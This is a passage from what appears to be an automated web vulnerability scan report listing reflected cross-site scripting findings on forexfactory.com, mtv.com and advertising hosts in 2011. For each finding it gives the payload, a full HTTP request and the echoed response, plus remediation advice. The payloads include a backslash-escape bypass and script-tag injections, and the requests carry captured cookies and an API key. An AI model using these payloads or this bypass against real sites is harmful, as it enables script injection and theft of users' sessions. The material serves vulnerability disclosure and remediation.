The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /ws_cal.php?do=fetch&width=845&height=500&font=14&dark=0&colors[3]=%23869BBF%20url%28images/gradients/gradient_tcat.gif%29%20repeat-x&colors[5]=%235C7099%20url%28images/gradients/gradient_thead.gif%29%20repeat-x&colors[7]=%23F5F5FF&colors[4]=%23FFFFFF&colors[6]=%23FFFFFF&colors[8]=%23000000&colors[1]=%230B198C&colors[2]=%23d1d1e126b9b\"%3balert(1)//33ca1322ece&width_type=px&height_type=px&timezone=-5&timeformat=0&timedst=1&nocache=8229.065318565583 HTTP/1.1
Host: www.forexfactory.com
Proxy-Connection: keep-alive
Referer: http://www.livewithoscar.com/Calendar.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response (redirected)

HTTP/1.1 200 OK
Date: Tue, 14 Jun 2011 12:07:57 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: fflastactivity=0; expires=Wed, 13-Jun-2012 12:07:57 GMT; path=/; domain=.forexfactory.com
Cache-Control: private
Pragma: private
X-UA-Compatible: IE=7
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Type: application/x-javascript; charset=windows-1252
Content-Length: 67984

var _sds_html = '';
_sds_html += "<form method=\"post\"action=\"index.php\" onsubmit=\"return ffSyndication_Calendar.calendar_filters(this, false);\" name=\"_cal_filters\">";
_sds_html += "<input ty
...[SNIP]...
<td class=\"dateHeading\" colspan=\"9\" style=\"border-bottom: 1px solid #d1d1e126b9b\\";alert(1)//33ca1322ece;\" width=\"100%\">
...[SNIP]...

3.41. http://www.forexfactory.com/ws_cal.php [colors[4] parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.forexfactory.com
Path:   /ws_cal.php

Issue detail

The value of the colors[4] request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cff61\"%3balert(1)//59731740299 was submitted in the colors[4] parameter. This input was echoed as cff61\\";alert(1)//59731740299 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /ws_cal.php?do=fetch&width=845&height=500&font=14&dark=0&colors[3]=%23869BBF%20url%28images/gradients/gradient_tcat.gif%29%20repeat-x&colors[5]=%235C7099%20url%28images/gradients/gradient_thead.gif%29%20repeat-x&colors[7]=%23F5F5FF&colors[4]=%23FFFFFFcff61\"%3balert(1)//59731740299&colors[6]=%23FFFFFF&colors[8]=%23000000&colors[1]=%230B198C&colors[2]=%23d1d1e1&width_type=px&height_type=px&timezone=-5&timeformat=0&timedst=1&nocache=8229.065318565583 HTTP/1.1
Host: www.forexfactory.com
Proxy-Connection: keep-alive
Referer: http://www.livewithoscar.com/Calendar.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response (redirected)

HTTP/1.1 200 OK
Date: Tue, 14 Jun 2011 12:06:19 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: fflastactivity=0; expires=Wed, 13-Jun-2012 12:06:19 GMT; path=/; domain=.forexfactory.com
Cache-Control: private
Pragma: private
X-UA-Compatible: IE=7
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Type: application/x-javascript; charset=windows-1252
Content-Length: 67744

var _sds_html = '';
_sds_html += "<form method=\"post\"action=\"index.php\" onsubmit=\"return ffSyndication_Calendar.calendar_filters(this, false);\" name=\"_cal_filters\">";
_sds_html += "<input ty
...[SNIP]...
<a href=\"#\" style=\"white-space: nowrap; color: #FFFFFFcff61\\";alert(1)//59731740299;\">
...[SNIP]...

3.42. http://www.forexfactory.com/ws_cal.php [colors[8] parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.forexfactory.com
Path:   /ws_cal.php

Issue detail

The value of the colors[8] request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cfe41\"%3balert(1)//5fae3ef9ef8 was submitted in the colors[8] parameter. This input was echoed as cfe41\\";alert(1)//5fae3ef9ef8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /ws_cal.php?do=fetch&width=845&height=500&font=14&dark=0&colors[3]=%23869BBF%20url%28images/gradients/gradient_tcat.gif%29%20repeat-x&colors[5]=%235C7099%20url%28images/gradients/gradient_thead.gif%29%20repeat-x&colors[7]=%23F5F5FF&colors[4]=%23FFFFFF&colors[6]=%23FFFFFF&colors[8]=%23000000cfe41\"%3balert(1)//5fae3ef9ef8&colors[1]=%230B198C&colors[2]=%23d1d1e1&width_type=px&height_type=px&timezone=-5&timeformat=0&timedst=1&nocache=8229.065318565583 HTTP/1.1
Host: www.forexfactory.com
Proxy-Connection: keep-alive
Referer: http://www.livewithoscar.com/Calendar.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response (redirected)

HTTP/1.1 200 OK
Date: Tue, 14 Jun 2011 12:07:07 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: fflastactivity=0; expires=Wed, 13-Jun-2012 12:07:07 GMT; path=/; domain=.forexfactory.com
Cache-Control: private
Pragma: private
X-UA-Compatible: IE=7
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Type: application/x-javascript; charset=windows-1252
Content-Length: 67864

var _sds_html = '';
_sds_html += "<form method=\"post\"action=\"index.php\" onsubmit=\"return ffSyndication_Calendar.calendar_filters(this, false);\" name=\"_cal_filters\">";
_sds_html += "<input ty
...[SNIP]...
<tr class=\"eventRow\" id='timeoptions' style=\"display: none; color: #000000cfe41\\";alert(1)//5fae3ef9ef8;\">
...[SNIP]...

3.43. http://www.mtv.com/games/arcade/game/play.jhtml [arcadeGameId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mtv.com
Path:   /games/arcade/game/play.jhtml

Issue detail

The value of the arcadeGameId request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c9d53"><script>alert(1)</script>9c033e45818 was submitted in the arcadeGameId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /games/arcade/game/play.jhtml?arcadeGameId=10325912c9d53"><script>alert(1)</script>9c033e45818 HTTP/1.1
Host: www.mtv.com
Proxy-Connection: keep-alive
Referer: http://www.mtv.com/games/arcade/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1864906649-1307963885068; mtvn_guid=1307963888-186; s_nr=1307963913916; ak-mobile-detected=no; projxcookie=yes; qcDemo=demo%253DD%253Bdemo%253DT%253Bdemo%253D5840%253Bdemo%253D2966%253Bdemo%253D2907%253Bdemo%253D2905%253Bdemo%253D2904%253Bdemo%253D1607%253Bdemo%253D1299%253Bdemo%253D850%253Bdemo%253D848%253Bdemo%253D844%253Bdemo%253D827%253Bdemo%253D790%253Bdemo%253D777%253Bdemo%253D775%253Bdemo%253D774; s_ppv=62; mbox=session#1308010496673-477284#1308012600|check#true#1308010800; __cs_rr=1; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Server: Apache/2.0.63 (Unix) mod_jk/1.2.27
Content-Type: text/html
ETag: 71a676dc24ad738496eca8b5e2b43ab6
Vary: Accept-Encoding
Cache-Control: max-age=573
Date: Tue, 14 Jun 2011 00:19:25 GMT
Content-Length: 15890
Connection: close

<error>No Data</error>

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" x
...[SNIP]...
<script type="text/javascript" src="/sitewide/scripts/reportIMX.jhtml?arcadeGameId=10325912c9d53"><script>alert(1)</script>9c033e45818">
...[SNIP]...

3.44. http://www.mtv.com/global/music/scripts/reportFluxView.jhtml [uri parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mtv.com
Path:   /global/music/scripts/reportFluxView.jhtml

Issue detail

The value of the uri request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 76933'%3balert(1)//6a994bac4ef was submitted in the uri parameter. This input was echoed as 76933';alert(1)//6a994bac4ef in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /global/music/scripts/reportFluxView.jhtml?uri=mgid:cms:item:mtv.com:1032591276933'%3balert(1)//6a994bac4ef HTTP/1.1
Host: www.mtv.com
Proxy-Connection: keep-alive
Referer: http://www.mtv.com/games/arcade/game/play.jhtml?arcadeGameId=10325912
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1864906649-1307963885068; mtvn_guid=1307963888-186; s_nr=1307963913916; ak-mobile-detected=no; projxcookie=yes; qcDemo=demo%253DD%253Bdemo%253DT%253Bdemo%253D5840%253Bdemo%253D2966%253Bdemo%253D2907%253Bdemo%253D2905%253Bdemo%253D2904%253Bdemo%253D1607%253Bdemo%253D1299%253Bdemo%253D850%253Bdemo%253D848%253Bdemo%253D844%253Bdemo%253D827%253Bdemo%253D790%253Bdemo%253D777%253Bdemo%253D775%253Bdemo%253D774; s_ppv=62; __cs_rr=1; s_cc=true; s_sq=%5B%5BB%5D%5D; mbox=session#1308010496673-477284#1308012624|check#true#1308010824

Response

HTTP/1.1 200 OK
Server: Apache/2.0.63 (Unix) mod_jk/1.2.27
ETag: 8b8896d1e8baa4e52a4cb67abcf72b
Last-Modified: Tue, 14 Jun 2011 00:19:32 GMT
Content-Type: application/x-javascript
Content-Length: 597
Cache-Control: max-age=86386
Date: Tue, 14 Jun 2011 00:19:32 GMT
Connection: close
Vary: Accept-Encoding

var reportUri = "mgid:cms:item:mtv.com:1032591276933';alert(1)//6a994bac4ef";

if (reportUri.indexOf("photolist") != -1) {
reportUri = reportUri.substring(reportUri.lastIndexOf(":") + 1);

if (document.referrer.indexOf(reportUri) == -1)
MTVN.Reporting.reportFluxView('http://t.flux.com/tracking.gif?CMU=D3FCFFFF0002D51D0002FFFFFCD3&CUR=mgid:cms:item:mtv.com:1032591276933';alert(1)//6a994bac4ef&WN=ContentView');
}
else
MTVN.Reporting.reportFluxView('http://t.flux.com/tracking.gif?CMU=D3FCFFFF0002D51D0002FFFFFCD3&CUR=mgid:cms:item:mtv.com:1032591276933';alert(1)//6a994bac4ef&WN=ContentView');
...[SNIP]...

3.45. http://www.mtv.com/global/music/scripts/reportFluxView.jhtml [uri parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mtv.com
Path:   /global/music/scripts/reportFluxView.jhtml

Issue detail

The value of the uri request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d3919"%3balert(1)//d2192e09569 was submitted in the uri parameter. This input was echoed as d3919";alert(1)//d2192e09569 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /global/music/scripts/reportFluxView.jhtml?uri=mgid:cms:item:mtv.com:10325912d3919"%3balert(1)//d2192e09569 HTTP/1.1
Host: www.mtv.com
Proxy-Connection: keep-alive
Referer: http://www.mtv.com/games/arcade/game/play.jhtml?arcadeGameId=10325912
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1864906649-1307963885068; mtvn_guid=1307963888-186; s_nr=1307963913916; ak-mobile-detected=no; projxcookie=yes; qcDemo=demo%253DD%253Bdemo%253DT%253Bdemo%253D5840%253Bdemo%253D2966%253Bdemo%253D2907%253Bdemo%253D2905%253Bdemo%253D2904%253Bdemo%253D1607%253Bdemo%253D1299%253Bdemo%253D850%253Bdemo%253D848%253Bdemo%253D844%253Bdemo%253D827%253Bdemo%253D790%253Bdemo%253D777%253Bdemo%253D775%253Bdemo%253D774; s_ppv=62; __cs_rr=1; s_cc=true; s_sq=%5B%5BB%5D%5D; mbox=session#1308010496673-477284#1308012624|check#true#1308010824

Response

HTTP/1.1 200 OK
Server: Apache/2.0.63 (Unix) mod_jk/1.2.27
ETag: 5014b291ce7f542c23c5819d4bdabeb
Last-Modified: Tue, 14 Jun 2011 00:19:32 GMT
Content-Type: application/x-javascript
Content-Length: 597
Cache-Control: max-age=86296
Date: Tue, 14 Jun 2011 00:19:32 GMT
Connection: close
Vary: Accept-Encoding

var reportUri = "mgid:cms:item:mtv.com:10325912d3919";alert(1)//d2192e09569";

if (reportUri.indexOf("photolist") != -1) {
reportUri = reportUri.substring(reportUri.lastIndexOf(":") + 1);

if (document.referrer.indexOf(reportUri) == -1)
MTVN.Reporting.reportFluxView('http://t
...[SNIP]...

3.46. http://www.mtv.com/sitewide/scripts/reportIMX.jhtml [arcadeGameId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mtv.com
Path:   /sitewide/scripts/reportIMX.jhtml

Issue detail

The value of the arcadeGameId request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cf21f'%3balert(1)//25ce7a73533 was submitted in the arcadeGameId parameter. This input was echoed as cf21f';alert(1)//25ce7a73533 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sitewide/scripts/reportIMX.jhtml?arcadeGameId=10325912cf21f'%3balert(1)//25ce7a73533 HTTP/1.1
Host: www.mtv.com
Proxy-Connection: keep-alive
Referer: http://www.mtv.com/games/arcade/game/play.jhtml?arcadeGameId=10325912
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1864906649-1307963885068; mtvn_guid=1307963888-186; s_nr=1307963913916; ak-mobile-detected=no; projxcookie=yes; qcDemo=demo%253DD%253Bdemo%253DT%253Bdemo%253D5840%253Bdemo%253D2966%253Bdemo%253D2907%253Bdemo%253D2905%253Bdemo%253D2904%253Bdemo%253D1607%253Bdemo%253D1299%253Bdemo%253D850%253Bdemo%253D848%253Bdemo%253D844%253Bdemo%253D827%253Bdemo%253D790%253Bdemo%253D777%253Bdemo%253D775%253Bdemo%253D774; s_ppv=62; __cs_rr=1; s_cc=true; s_sq=%5B%5BB%5D%5D; mbox=session#1308010496673-477284#1308012624|check#true#1308010824

Response

HTTP/1.1 200 OK
Server: Apache/2.0.63 (Unix) mod_jk/1.2.27
ETag: d1ae8408bccac9b42438b17c11806e
Last-Modified: Tue, 14 Jun 2011 00:19:33 GMT
Content-Type: application/x-javascript
Content-Length: 333
Cache-Control: max-age=86389
Date: Tue, 14 Jun 2011 00:19:33 GMT
Connection: close
Vary: Accept-Encoding

if(typeof MTV.Reporting.reportIMX == "function"){
var reportIMX = MTV.Reporting.reportIMX;

reportIMX('http://imx.mtv.com/sitewide/droplets/view_gen.jhtml?itemUrl=cms_item%3A%2F%2Fwww.mtv.com%2F10325912cf21f%27%3Balert%281%29%2F%2F25ce7a73533&tagParams=tag_action%3Dviewed%26', 'cms_item', '10325912cf21f';alert(1)//25ce7a73533');

}

3.47. http://api.bizographics.com/v1/profile.json [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://api.bizographics.com
Path:   /v1/profile.json

Issue detail

The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload fa9fc<script>alert(1)</script>664cb18f463 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /v1/profile.json?&callback=dj.module.ad.bio.loadBizoData&api_key=r9t72482usanbp6sphprhvun HTTP/1.1
Host: api.bizographics.com
Proxy-Connection: keep-alive
Referer: fa9fc<script>alert(1)</script>664cb18f463
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BizoNetworkPartnerIndex=3; BizoID=3c403c93-d95c-49df-9ac2-80ec4d87e192; BizoData=vipSsUXrfhMAyjSpNgk6T39Qb1MaQBj6WisqThbDTBp4B2VrCIGNp5RVO9z4XipLmXyvHipHCqwrNYQnSLfO0fWLyTcgvE2yQ6Ze1pbZ033FKv3YPdeKubByYtiikBBmWL9vy8qeiiV0HIm4nYPdeKubByYsTG1iiA4HFhaObXcis5ip6FU7wE4Cwiib580ipET68lwNWsfNIUXfAULHZeWiinnp8DesekBgQXcy3tgL326ELqfmQZU2ueTC3wAqip042iirMZRzHxvSTtisvHuK6gvBr0Pej7isVgBvV8Kk0mwBbXkU4HujvywisJd2WNMedisMgTj03JcHP8nOcWG7PlEjoggxAnMEZgmfujiiwd7OBYhLnmqoZbsnNXFrLu9efHlOsWD3viiCAgYAghYxv0EPdR9KLjw34ANmJisipoEKzRnoN2kisFipn0SmXcpqPldy6c1wwIOnACxhiiZKjPFbQPWovaWUipNN9QFd9eD4OnACxhiiZKjFbQEPZ8RywpanugMm4hIisHF8ipo0I9mx5t08YADUXDkiigPUiiKWBw7T81HeReHfLTisiiisV8xMd5is5La2EsecOiiswIOnACxhiiZKjZaTdMSAamf236fFiiolkC0OCwcaIYpAt5LXM0XIwCmlb9oLhkw16YkipCwcaIYpAt5WoPvGg4qipctjJkmu5ePipiiMaODe9cOOkiihdML7elZkd0OC52PD2YWGqMTlyYtq6ZaRfZf5eQkf2ovdhChExDfe35GyRzNlvLnotcIy4PNP83xecbst1iib7gFsDSqDpxImEGrfTPfpgZUI4cd9sW5wsAHescjFAyxuEGrfTPfpgZXwYXPBFhecOvsiim5vOPNb106OGBImB2putC69uElEwF27JCOiioj1KhgUUhrqOIuN5aBiiOnqpc8IV71Rjsv7Qu4issSdo1Daipe1h0yfLwyxARVExkNK7HUtFp4B4dlWpgdhb8ERjlseVzj8l3ZY0x538DagN4siiD1aaCmzSiiJQK8lykQMu396nckTo4nxwoHo0CoRZSiif2tsuiicEnxS3cJipCVZ8TsalisgS9TXOCwHZXFvbNlR3nLMBjv3LIcisLQsnJDisGQdUK2D6ztJRFsRyXovJAo8OukxqBLBWr1XIQIIGVWAglyTqlNGtBiitkUr3XlAiscQyzlKxEyj6p6QYsvgf51m9Da6XiirwxBVxp0nP77W3oMweEdXU6bnuSFykW54FN6yii1oRyCQGqk84Nzl6iivmHYAZUugJ8wSyDpwAsYYmSo3LDnHii2Cip8QnOcWG7PlEjokDX1b7LIGtQieie

Response

HTTP/1.1 403 Forbidden
Cache-Control: no-cache
Content-Type: text/plain
Date: Tue, 14 Jun 2011 00:17:01 GMT
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Content-Length: 58
Connection: keep-alive

Unknown Referer: fa9fc<script>alert(1)</script>664cb18f463

3.48. http://ar.voicefive.com/b/node_rcAll.pli [BMX_3PC cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /b/node_rcAll.pli

Issue detail

The value of the BMX_3PC cookie is copied into the HTML document as plain text between tags. The payload 33f3f<script>alert(1)</script>1e9269f0574 was submitted in the BMX_3PC cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /b/node_rcAll.pli?func=COMSCORE.BMX.Buddy.run&1308010663788 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/mtv.mtvi/survey;sec0=music;sec1=_mn;node=survey;sz=1x2;ord=733653447125107100?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91143664=exp=1&initExp=Fri May 20 12:39:51 2011&recExp=Fri May 20 12:39:51 2011&prad=296638381&arc=218676885&; ar_p101866669=exp=1&initExp=Sat May 21 12:32:54 2011&recExp=Sat May 21 12:32:54 2011&prad=323226876&arc=219379757&; ar_p84552060=exp=1&initExp=Sat May 21 12:33:10 2011&recExp=Sat May 21 12:33:10 2011&prad=2108512&arc=4477554&; ar_p97174789=exp=4&initExp=Tue May 17 20:12:51 2011&recExp=Sat May 21 12:34:25 2011&prad=253735209&arc=207615215&; ar_p56282763=exp=1&initExp=Sat May 28 21:31:35 2011&recExp=Sat May 28 21:31:35 2011&prad=62187190&cpn=910903057632460979&arc=41550035&; ar_p101945457=exp=2&initExp=Thu Jun 2 01:11:58 2011&recExp=Thu Jun 2 01:16:20 2011&prad=64669762&arc=42330646&; ar_p81479006=exp=5&initExp=Mon May 23 12:32:43 2011&recExp=Mon Jun 6 10:06:28 2011&prad=64422792&rn=1787539&arc=40380395&; ar_p82806590=exp=6&initExp=Sat May 21 12:32:31 2011&recExp=Mon Jun 6 10:11:46 2011&prad=64304737&arc=40380915&; ar_p20101109=exp=2&initExp=Mon Jun 6 11:54:51 2011&recExp=Mon Jun 13 11:13:21 2011&prad=11794&arc=15313&; ar_p97464717=exp=1&initExp=Mon Jun 13 11:26:24 2011&recExp=Mon Jun 13 11:26:24 2011&prad=1468426&arc=150255&; BMX_BR=pid=p104567837&prad=63567820&arc=42361216&exp=1308010528; ar_p104567837=exp=2&initExp=Mon Jun 13 11:34:28 2011&recExp=Tue Jun 14 00:15:28 2011&prad=63567820&arc=42361216&; UID=4a757a7-24.143.206.42-1305663172; BMX_3PC=133f3f<script>alert(1)</script>1e9269f0574

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 14 Jun 2011 00:17:46 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: BMX_G=0; expires=Thu 18-Sep-2008 00:17:46 GMT; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 1557

COMSCORE.BMX.Buddy.run({ "ar_p97464717": 'exp=1&initExp=Mon Jun 13 11:26:24 2011&recExp=Mon Jun 13 11:26:24 2011&prad=1468426&arc=150255&', "ar_p101866669": 'exp=1&initExp=Sat May 21 12:32:54 2011&
...[SNIP]...
"ar_p56282763": 'exp=1&initExp=Sat May 28 21:31:35 2011&recExp=Sat May 28 21:31:35 2011&prad=62187190&cpn=910903057632460979&arc=41550035&', "UID": '4a757a7-24.143.206.42-1305663172', "BMX_3PC": '133f3f<script>alert(1)</script>1e9269f0574', "ar_p101945457": 'exp=2&initExp=Thu Jun 2 01:11:58 2011&recExp=Thu Jun 2 01:16:20 2011&prad=64669762&arc=42330646&', "BMX_BR": 'pid=p104567837&prad=63567820&arc=42361216&exp=1308010528', "ar_p9
...[SNIP]...

3.49. http://ar.voicefive.com/b/node_rcAll.pli [BMX_BR cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /b/node_rcAll.pli

Issue detail

The value of the BMX_BR cookie is copied into the HTML document as plain text between tags. The payload 9d9d7<script>alert(1)</script>a917426b808 was submitted in the BMX_BR cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /b/node_rcAll.pli?func=COMSCORE.BMX.Buddy.run&1308010663788 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/mtv.mtvi/survey;sec0=music;sec1=_mn;node=survey;sz=1x2;ord=733653447125107100?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
